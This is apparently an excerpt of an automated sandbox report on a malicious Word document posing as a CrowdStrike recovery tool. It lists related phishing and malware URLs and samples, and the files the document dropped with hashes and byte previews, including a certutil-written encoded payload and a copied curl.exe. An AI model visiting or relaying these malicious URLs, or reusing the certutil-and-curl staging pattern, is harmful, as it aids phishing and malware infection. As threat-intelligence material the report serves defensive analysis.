	https://trk.klclick3.com/ls/click?upn=u001.F5FUvNp8lGuVBrfF8VWSt-2Befrq4JwHZUrXxYUllvBu6JQLRTleNqoOq9cK2V6H9nF6TE8i5ai18ELwuaCRLRwA-3D-3DeBON_1svWsHF9QtKh6I35BSRfJziCtreSweSmmjNgxUuzWxLFgb12Ddkvv3gPW-2BY7HCV4BtwDYPCgqFm6ezf3LGkFgw-2FasXzQ01tiusM7qj7f7wQzyFpk04U-2BNsOiH-2B6C0IEGGhuBHlH4nFGk5hM1YrilA-2FklNstU7j1vcFJG8iHzTeSRYHOXIpK0cVyPDdeQeDUKiYrTYys-2FJ6BSjWfQuGIzI8V57VImtAPAAkrpuUD31VELoL-2FwLqoqcEcJaE-2B6fpm2wPTZkCul8wgxqc4qQClvNSQEUdlWOW-2BnsmWvhHzUvBgdPRhNpiRMg8ZZ-2BBQBoSFlRkufcGBk8zdT6H-2B-2FULHcbxzCKE71NmfbhvHZ7lmXl2A-3D	Get hash	malicious	Tycoon2FA	Browse
	https://important-invite.ru/invitersvp/	Get hash	malicious	HTMLPhisher	Browse
	https://www.google.com.au/url?q=//www.google.co.nz/amp/s/clientdevelopmentserver.com/secure/documentattached.html	Get hash	malicious	HTMLPhisher	Browse
	Play__Now___Aud_for_matthew.whistler@holcim.com.html	Get hash	malicious	Unknown	Browse
	https://automarketjobs.com/visionrepartners/	Get hash	malicious	HTMLPhisher	Browse
	https://kwxciujqil.joseph-mathieu.workers.dev/?lneigvrscbp=Y25wZ2xhbW91ci1idXNpbmVzc0Bjb25kZW5hc3QuY29t	Get hash	malicious	Unknown	Browse

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\curl.exe	N-WITHERSPOON-46151.js	Get hash	malicious	Unknown	Browse
	N-WITHERSPOON-86707.js	Get hash	malicious	Unknown	Browse
	N-WITHERSPOON-46151.js	Get hash	malicious	Unknown	Browse
	N-WITHERSPOON-86707.js	Get hash	malicious	Unknown	Browse
	knfV5IVjEV.lnk	Get hash	malicious	Unknown	Browse
	J-JeremieKarg-78462.js	Get hash	malicious	Unknown	Browse
	J-JeremieKarg-78462.js	Get hash	malicious	Unknown	Browse
	5cc2ecc53d742b200482b633d471df19bdf979796e8289d89f50cea2.vbs	Get hash	malicious	DarkGate	Browse
	6a7c258b33be34d613ad96e19665ce25bee7eefcf55204640682d6cc.vbs	Get hash	malicious	DarkGate	Browse
	Efz.vbs	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\41D51BF0.jpg

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 841x744, components 3
Category:	dropped
Size (bytes):	74268
Entropy (8bit):	7.9444839660162145
Encrypted:	false
SSDEEP:	1536:KJJ9JA6k9NJBwEQVuIeFVfm5iQmeDDRx/XBdRbX1o/:KJJ/uBw0FV+5iQmeBx/xdRbX1o/
MD5:	45C59288E77195B7C14579CD59717986
SHA1:	AEF3C27DB85493C0E85CAD04E301C092640E7684
SHA-256:	C4AFC369DC15759D81E8563052CFDA5D04EF6B7F76177EB01AA4C2695CB1486F
SHA-512:	7B1F375175780FC5864FA67C1CE64A885B471678EF2D966B00107AE3FBC1649EDE1388BC5F382A002105FC2F624DA230C64D21F005DA79D4EE9B7C20B5764BDE
Malicious:	false
Preview:	......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................I.......................ICC_PROFILE.......lcms.0..mntrRGB XYZ ............acspMSFT....lcms...........................-lcms................................................dmnd.......jdesc.......hdmdd.......hwtpt...P....rXYZ...d....bXYZ...x....gXYZ........rTRC........gTRC........bTRC........chrm.......$cprt.......!desc........lcms generated .................................................................................desc........sRGB........................................................................................desc........sRGB........................................................................................XYZ .......=........XYZ ......o...8.....XYZ ......$.........XYZ ......b.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.\|......................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B853177E.jpg

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 841x518, components 3
Category:	dropped
Size (bytes):	79621
Entropy (8bit):	7.949654755512444
Encrypted:	false
SSDEEP:	1536:EJJt5rmggmHt1zVpigR5lV4Bj1yh0/fakUhx4ZnfO8gf:EJJ3mg9/zVpigR5lw1HabP4ZfOx
MD5:	54A07C35DADB508F554F0ED25AA155B3
SHA1:	84FAC4D81E2AF4E920E4971F8A5D53AC4A8C6BDA
SHA-256:	94EE01362EE9EE7E61A1A62BD197CFF851A64B1DE02AAFE24C1E0A464E4A6036
SHA-512:	D9550DA2511C031F863C6DBDBEBE09E58E3DB74BC7EB564BF7667F8C8F12A55C155092074EDC2FF66AEA6AB7EF630E6625D7F50B68F4EF3215858A407F5320E1
Malicious:	false
Preview:	......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................I.......................ICC_PROFILE.......lcms.0..mntrRGB XYZ ............acspMSFT....lcms...........................-lcms................................................dmnd.......jdesc.......hdmdd.......hwtpt...P....rXYZ...d....bXYZ...x....gXYZ........rTRC........gTRC........bTRC........chrm.......$cprt.......!desc........lcms generated .................................................................................desc........sRGB........................................................................................desc........sRGB........................................................................................XYZ .......=........XYZ ......o...8.....XYZ ......$.........XYZ ......b.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.\|......................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C2E26567.jpg

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 838x340, components 3
Category:	modified
Size (bytes):	44995
Entropy (8bit):	7.9304820357792645
Encrypted:	false
SSDEEP:	768:QYytYytYyziJ6D4TnrTn8zbDRrjzQLpFDSsgwpfw+6+i:QJJXiJ6DYrkLQ1Fhdpo+6+i
MD5:	D76D9D62CD9BDB3201F8B08A60DDD681
SHA1:	A0A5A65424C08AD3C165B72DCC790F5682149DA2
SHA-256:	5B00B1362C95117CC1FBD59F3248ACF3F4DFE6F86D11999ECDEE9458F04E17E9
SHA-512:	2890D8218157B84D477D48772DE2FF81CE363EF3A1535CA5D3E2AEE48381EAD18C59827E944E127EED0412F317B9825CBB5AEF9CFAD953B0F20F8D720B10B121
Malicious:	false
Preview:	......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................F...........T...........ICC_PROFILE.......lcms.0..mntrRGB XYZ ............acspMSFT....lcms...........................-lcms................................................dmnd.......jdesc.......hdmdd.......hwtpt...P....rXYZ...d....bXYZ...x....gXYZ........rTRC........gTRC........bTRC........chrm.......$cprt.......!desc........lcms generated .................................................................................desc........sRGB........................................................................................desc........sRGB........................................................................................XYZ .......=........XYZ ......o...8.....XYZ ......$.........XYZ ......b.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.\|......................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FB640B31.jpg

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 837x754, components 3
Category:	dropped
Size (bytes):	66364
Entropy (8bit):	7.930881392262679
Encrypted:	false
SSDEEP:	768:UYytYytYy/OGTWD1qufcR9kyKfMhzEQnsi0Bm4/eevUAGEdUBS00dWX4VLZG:UJJLOGxJDiUiQnR6m4WAUEdUkgXM1G
MD5:	FA62B61B2E012E56787AD09FF660B32A
SHA1:	32F29245140B72BD99D4C42408EDA9DFE4F088CC
SHA-256:	643C921D41C123EB27A5BED51AF0F611EA7ECB4EFD3A5FA34DE8FFBC8F5781FD
SHA-512:	FB7145BAC331C9A246C49D1E9854398CF65DF6B023BC0E3448A10A4759FB6DA8D60D90316E29991FDE559D0E43A1D5BB5EA3D5837F284DEA3B9EED0143A1D3B6
Malicious:	false
Preview:	......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................E.......................ICC_PROFILE.......lcms.0..mntrRGB XYZ ............acspMSFT....lcms...........................-lcms................................................dmnd.......jdesc.......hdmdd.......hwtpt...P....rXYZ...d....bXYZ...x....gXYZ........rTRC........gTRC........bTRC........chrm.......$cprt.......!desc........lcms generated .................................................................................desc........sRGB........................................................................................desc........sRGB........................................................................................XYZ .......=........XYZ ......o...8.....XYZ ......$.........XYZ ......b.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.\|......................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRC0000.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Microsoft Word 2007+
Category:	dropped
Size (bytes):	20515
Entropy (8bit):	7.469835486287775
Encrypted:	false
SSDEEP:	384:Pjl/SU5NrbWwV+A9QG6F7//oMaoNy3aPWPOzROejkIQMAPZU:LrPlo1k3aPWPONjkIFAK
MD5:	747F920591F171BA793209DB3BFD8A21
SHA1:	BCF601F9500A6B5C20DB101840F4288D685FC57D
SHA-256:	74C3C074A163990B2E25692F8656F2232B9D4B07D0B34FE7A3F40127F6838CF3
SHA-512:	0D37436D7BF6BF640377525F7E2E926929B64C5D31686B4CF69083CCCDF53AC4F85F98BF380D49DE9B585055237FA9156D696C81081B676364771F2415790683
Malicious:	false
Preview:	PK..........!.+:.P............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................n.0.E.......D...(,g..6@]t.#.._.0..}......QM.l..1....5...YS.@D.].....I..[....k..U..S.x.-......7..6.V..e...'.Qn..l\|.Go:..Ht..<.y%....f.....Ku..l1....6.Z...=I......0{.L.`...H..S.\.CC..op...#..O:.7....Si.VP]....K...G...rh.......$....BF.t..Z.y.]O..+...,..{.j.uZ...qB...i..i.....t.,..$-my.{...q7H..JL..{P.E..../Fq$>...FX.)...b...k..E.Ni..0C..^.P..7z`.......E<......)...G.]....9./......g...I4...g....<eI[."..4m.?.6.q..k

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRC0001.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Microsoft Word 2007+
Category:	dropped
Size (bytes):	250145
Entropy (8bit):	7.9935463566733125
Encrypted:	true
SSDEEP:	6144:m00BJM20XF07Jtd0YPFKGTFHLYwgNkSagBRK3WJMLtFqFk06TOOp7uuVZpVPvG:wBJUXydtdfogBLngNMVG6xFqJ6TOOdur
MD5:	891E6C7EC5DE6384509564D8A0DEDECF
SHA1:	187994C9D8A21DD977473EF8E7A6EF4C7F2EAE52
SHA-256:	1E224B11854CE62115305CE613169DAD1C4AA59D35C8482E979532ADCA124A10
SHA-512:	27D6EF69B33A4F363E3D939EA4988A477B09F40401FF7645A6D7AA2ABDB9F7AD329C6A70B50996F27789164E5E2E4A41C12B3BACD2FB2B4EAC9486C00AD4D7E8
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	PK..-.......!..am.............[Content_Types].xml.......................n.0.........D...(,...6@. W.Z.t...k'~..-Eh..tj.b.".Y.....Yw..\|P.l^.X.F.Z..d..../,.(L-:k.d;..z....~. d.6.d+D... W.E(..C+..Z ..-wB..-.O..g..A0.cd.......0.}..}.J..}..E....:%..2...!.M.$..J.y......[...L..f.= ..D......R....r.6.p.+....Oj.W5dw....i......M..8f8.()F....[#..hU(s.r....(.a6(...&.....AS.].......w`.m.F.xT..........{.9o%.@8..#:.".p..=7m..$.".@NFx...d)..'.4..8E7Ft2..z../.d........z..} .8....N.@...=.$..c..s?....Q.....;i....>.>..[..{...}....9...,.. ..PK..-.......!..U~............._rels/.rels......................MK.1....!.;."..^D.Md..C2.........(.....3y..3C....+.4xW..(A.......yX.JB....Wp.....b..#InJ.......E..b.=[J....M.%...a .B..,o0.f@=a... n........o.A..;.N.<...v.."...e...b.R...1..R.EF..7Z.n...hY..j.y..#1'.<....7.......9m.......3...Y.. ..PK..-.......!.qq..............word/document.xml....m.......2(.......}.n........^..-.N.3I QT.M..hw.9@..E...S$./.}...;.... .G.'..*R..v.@-+.A

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	4.6310420804504275
Encrypted:	false
SSDEEP:	384:xtT+CeCz8l15lZzNKY235JzN0jyLUt3EN+DCz8l15lZzNKY235JzPN0jyL:aCa/lZzNj235lNdOCa/lZzNj235l1d
MD5:	7911062030D6DA09593877F2B52686EC
SHA1:	04AA8A751201A7373844A0AD9CA64403FADE98DA
SHA-256:	5D9BF8B45FB2E025C833D6A12BF29CC1C7F3DE7315E57A893354C826BD5A0207
SHA-512:	162008F9523744C2DF75E2B74CAC7AE034F79E2E2EC35A8337E0CDD2393A09E8F4B711DB5E844A362917C9000DF420F1B82A9C46F55D7315D1274E9F3DD8033E
Malicious:	false
Preview:	......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................>...D...................................................................................................................................................................................................................................?...@...A...B...C...E...~.......................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{68411966-DD48-4946-AB3B-864E53BCEEA6}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	81920
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	030A4F48DC8DB0956ADD25994004E5CA
SHA1:	D81C6AFAF95FA3886685DF4F9F7D93F4F403226C
SHA-256:	FA569E2360C540E6280E34A4627516770F1A5F34D81D35689334A99CC1013357
SHA-512:	9B844A86C0995A64A9CF163BCB58B8B1F2302E65B03CF5D90445078B0DBA11C687BBE1D94B81DB5EF52651BCC5D0B39EBFED9940D416E05A35330C17BF1E6D68
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map 6 x 7 x 8 +4 +5 "\011"
Category:	dropped
Size (bytes):	41984
Entropy (8bit):	3.6661534757164875
Encrypted:	false
SSDEEP:	768:GxRM3+y24Zwkvp1RkxOIvMILjnOojy1TRUS7V8iOuCDSe3fsM8pp3:GxW3+54Kkvp1RkxOIvfPnOojGV8juCDG
MD5:	6156FD728E0A9488C31DF5BBC8F844BF
SHA1:	16B20A75C6113409F1E78A1B66B1E2B647713DE2
SHA-256:	07C1401BCA0B13228AFF72314F6247F60A105492B695E817EE2A784643644DA5
SHA-512:	0A56DC6F0193CE70F4DC0876FCBE7ABC53D23F8A5C80032C68F49856A16B64B3B2E4B5BBAFA384FF57F0A586A484DB1464EE65EC5454BA64DB5E23AF1B3A9A13
Malicious:	false
Preview:	................................................................ .!.".#.$.%.&.'.(.).*.+.,.-.../.0.1.2.3.4.5.6.7.8.9.:.;.<.=.>.................A.s. .a. .f.o.l.l.o.w.-.u.p. .t.o. .t.h.e. .C.r.o.w.d.S.t.r.i.k.e. .F.a.l.c.o.n. .a.g.e.n.t. .i.s.s.u.e. .i.m.p.a.c.t.i.n.g. .W.i.n.d.o.w.s. .c.l.i.e.n.t.s. .a.n.d. .s.e.r.v.e.r.s.,. .M.i.c.r.o.s.o.f.t. .h.a.s. .r.e.l.e.a.s.e.d. .a.n...u.p.d.a.t.e.d...r.e.c.o.v.e.r.y. .t.o.o.l. .w.i.t.h...t.w.o. .r.e.p.a.i.r. .o.p.t.i.o.n.s...t.o. .h.e.l.p. .I.T. .a.d.m.i.n.s. .......................................................X...........$...(.......$...(......................................................................................................................................................................................................................................................................................................................................................$..&..F...d......d...d.-D..M............[$.\$.a$.gdK.e.....$.-D..M...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9512A27C-373D-4C6D-8C25-ECB66CCA249E}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CD9FBDB6-0620-4DF5-9AD1-8E60378C9E3C}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map 6 x 7 x 8 +4 +5 "\011"
Category:	dropped
Size (bytes):	41984
Entropy (8bit):	3.6661534757164875
Encrypted:	false
SSDEEP:	768:GxRM3+y24Zwkvp1RkxOIvMILjnOojy1TRUS7V8iOuCDSe3fsM8pp3:GxW3+54Kkvp1RkxOIvfPnOojGV8juCDG
MD5:	6156FD728E0A9488C31DF5BBC8F844BF
SHA1:	16B20A75C6113409F1E78A1B66B1E2B647713DE2
SHA-256:	07C1401BCA0B13228AFF72314F6247F60A105492B695E817EE2A784643644DA5
SHA-512:	0A56DC6F0193CE70F4DC0876FCBE7ABC53D23F8A5C80032C68F49856A16B64B3B2E4B5BBAFA384FF57F0A586A484DB1464EE65EC5454BA64DB5E23AF1B3A9A13
Malicious:	false
Preview:	................................................................ .!.".#.$.%.&.'.(.).*.+.,.-.../.0.1.2.3.4.5.6.7.8.9.:.;.<.=.>.................A.s. .a. .f.o.l.l.o.w.-.u.p. .t.o. .t.h.e. .C.r.o.w.d.S.t.r.i.k.e. .F.a.l.c.o.n. .a.g.e.n.t. .i.s.s.u.e. .i.m.p.a.c.t.i.n.g. .W.i.n.d.o.w.s. .c.l.i.e.n.t.s. .a.n.d. .s.e.r.v.e.r.s.,. .M.i.c.r.o.s.o.f.t. .h.a.s. .r.e.l.e.a.s.e.d. .a.n...u.p.d.a.t.e.d...r.e.c.o.v.e.r.y. .t.o.o.l. .w.i.t.h...t.w.o. .r.e.p.a.i.r. .o.p.t.i.o.n.s...t.o. .h.e.l.p. .I.T. .a.d.m.i.n.s. .......................................................X...........$...(.......$...(......................................................................................................................................................................................................................................................................................................................................................$..&..F...d......d...d.-D..M............[$.\$.a$.gdK.e.....$.-D..M...

C:\Users\user\AppData\Local\Temp\curl.exe

Download File

Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	530944
Entropy (8bit):	6.426002179912066
Encrypted:	false
SSDEEP:	12288:fY/9QPTCgxPjg26sSS4x0WZ40lNYgBOJDN3NlhBATWStJ:geLCY0mSSxWG0lN1O7rA6StJ
MD5:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
SHA1:	C9ECDE4DE3C60F99C69BBCA4332F4162E0BF252F
SHA-256:	D76D08C04DFA434DE033CA220456B5B87E6B3F0108667BD61304142C54ADDBE4
SHA-512:	1B04B40D36B6CDCB805C720341A21885594B9C7BAEAD0A6CC56E7F6CC1ACDFDB2522C12276B0973EAF2911A6D2A105DEFC27D48E574A6F87A11BFACCACF65E3F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: N-WITHERSPOON-46151.js, Detection: malicious, Browse Filename: N-WITHERSPOON-86707.js, Detection: malicious, Browse Filename: N-WITHERSPOON-46151.js, Detection: malicious, Browse Filename: N-WITHERSPOON-86707.js, Detection: malicious, Browse Filename: knfV5IVjEV.lnk, Detection: malicious, Browse Filename: J-JeremieKarg-78462.js, Detection: malicious, Browse Filename: J-JeremieKarg-78462.js, Detection: malicious, Browse Filename: 5cc2ecc53d742b200482b633d471df19bdf979796e8289d89f50cea2.vbs, Detection: malicious, Browse Filename: 6a7c258b33be34d613ad96e19665ce25bee7eefcf55204640682d6cc.vbs, Detection: malicious, Browse Filename: Efz.vbs, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.{MPq(MPq(MPq(+?.(FPq(.%t)kPq(.%u)BPq(.%r)GPq(D(.(.Pq(>2p)DPq(MPp(.Pq(.%y).Pq(.%.(LPq(.%s)LPq(RichMPq(........PE..d...J.~b.........."..........\.................@.............................`......[.....`.................................................H...4....@..@........(...........P..........T..............................8............................................text............................... ..`.rdata..............................@..@.data...`...........................@....pdata...(.......*..................@..@_RDATA.......0......................@..@.rsrc...@....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\curl.txt

Download File

Process:	C:\Windows\System32\certutil.exe
File Type:	PEM certificate
Category:	dropped
Size (bytes):	730108
Entropy (8bit):	5.445175115010181
Encrypted:	false
SSDEEP:	12288:sbWG2aZxq0mOWBsfuZ6/D7ilVVMvk43mw:siG2RvOWB8ui7kVVEB
MD5:	6CD8C188A2B0A5A11B2F02648B675874
SHA1:	11F8F207DA2F2B64E8A978B37BC091DA25B380C4
SHA-256:	B27A847F5059294E8E6F9C8B939C0437173C73E0194CF03CDCE4092A025B0C8F
SHA-512:	8C83E985C44F63E382CCFE64662D3E54137A4ADE7C0EE9BC409095F0631D471BFEF7A00FB8E6073CAFDD9ACAA8E241BACEC934AE1430728749002882D2BE366B
Malicious:	true
Preview:	-----BEGIN CERTIFICATE-----..TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5v..dCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAAJMR97TVBxKE1QcShNUHEo..Kz+MKEZQcSgfJXQpa1BxKB8ldSlCUHEoHyVyKUdQcShEKOIoAVBxKD4ycClEUHEo..TVBwKKVQcSiMJXkp3FBxKIwljihMUHEojCVzKUxQcShSaWNoTVBxKAAAAAAAAAAA..UEUAAGSGBwBKtn5iAAAAAAAAAADwACIACwIOHQDIBQAAXAIAAAAAABC3BQAAEAAA..AAAAQAEAAAAAEAAAAAIAAAYAAAAAAAAABgAAAAAAAAAAYAgAAAQAAFsXCQADAGDB..AAAQAAAAAAAAEAAAAAAAAAAAEAAAAAAAABAAAAAAAAAAAAAAEAAAAAAAAAAAAAAA..SMoHADQDAAAAQAgAQAcAAAAACACYKAAAAAAAAAAAAAAAUAgA8A8AAICjBwBUAAAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4KMHADgBAAAAAAAAAAAAAADgBQAQCAAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAAAAxwUAABAAAADIBQAABAAA..AAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAAjAcCAADgBQAACAIAAMwFAAAAAAAAAAAA..AAAAAEAAAEAuZGF0YQAAAGAPAAAA8AcAAAIAAADUBwAAAAAAAAAAAAAAAABAAADA..LnBkYXRhAACYKAAAAAAIAAAqAAAA1gcAAAAAAAAAAAAAAAAAQAAAQF9SREFUQQAA../AAAAAAwCAAAAgAAAAAIAAAAAAAAAAAAAAAAAEAAAEAucnN

C:\Users\user\AppData\Local\Temp\msoAB8B.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	GIF image data, version 89a, 15 x 15
Category:	dropped
Size (bytes):	663
Entropy (8bit):	5.949125862393289
Encrypted:	false
SSDEEP:	12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
MD5:	ED3C1C40B68BA4F40DB15529D5443DEC
SHA1:	831AF99BB64A04617E0A42EA898756F9E0E0BCCA
SHA-256:	039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
SHA-512:	C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
Malicious:	false
Preview:	GIF89a....w..!..MSOFFICE9.0.....sRGB......!..MSOFFICE9.0.....msOPMSOFFICE9.0Dn&P3.!..MSOFFICE9.0.....cmPPJCmp0712.........!.......,....................'..;..b...RQ.xx..................,+................................yy..;..b.........................qp.bb..........uv.ZZ.LL.......xw.jj.NN.A@....zz.mm.^_.........yw........yx.xw.RR.,.++............................................................................................................................................................................................................8....>.......................4567...=..../0123.....<9:.()+,-.B.@...."#$%&'....... !............C.?....A;<...HT(..;

C:\Users\user\AppData\Local\Temp\msoAFEE.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	GIF image data, version 89a, 15 x 15
Category:	dropped
Size (bytes):	663
Entropy (8bit):	5.949125862393289
Encrypted:	false
SSDEEP:	12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
MD5:	ED3C1C40B68BA4F40DB15529D5443DEC
SHA1:	831AF99BB64A04617E0A42EA898756F9E0E0BCCA
SHA-256:	039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
SHA-512:	C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
Malicious:	false
Preview:	GIF89a....w..!..MSOFFICE9.0.....sRGB......!..MSOFFICE9.0.....msOPMSOFFICE9.0Dn&P3.!..MSOFFICE9.0.....cmPPJCmp0712.........!.......,....................'..;..b...RQ.xx..................,+................................yy..;..b.........................qp.bb..........uv.ZZ.LL.......xw.jj.NN.A@....zz.mm.^_.........yw........yx.xw.RR.,.++............................................................................................................................................................................................................8....>.......................4567...=..../0123.....<9:.()+,-.B.@...."#$%&'....... !............C.?....A;<...HT(..;

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:13 2023, mtime=Fri Aug 11 15:42:13 2023, atime=Mon Jul 22 12:51:17 2024, length=250145, window=hide
Category:	dropped
Size (bytes):	1299
Entropy (8bit):	4.58294566129774
Encrypted:	false
SSDEEP:	24:83C1z/XT4lopZGYcPxD/juxNeMuYZscPxD/juvDv3q8k7N:8sz/XTk8HclWVuYZsclp8iN
MD5:	8080A08A9762D4028FCFCD91E287A9A6
SHA1:	DCF3276796F1F251023389829C817EEF32BE9771
SHA-256:	9A68761F2A1D1574751C6C3E59C30A8BB361102A2F17F0F9F54133A1992CE3DD
SHA-512:	7DC5A94218F8042B645EB906324F56ADE093E4D6EFFD5E09E80062E39AFC1CCDBBE32CB7E26398714CA2D61E305A013F34A26B78656CB1AE869135245497709A
Malicious:	false
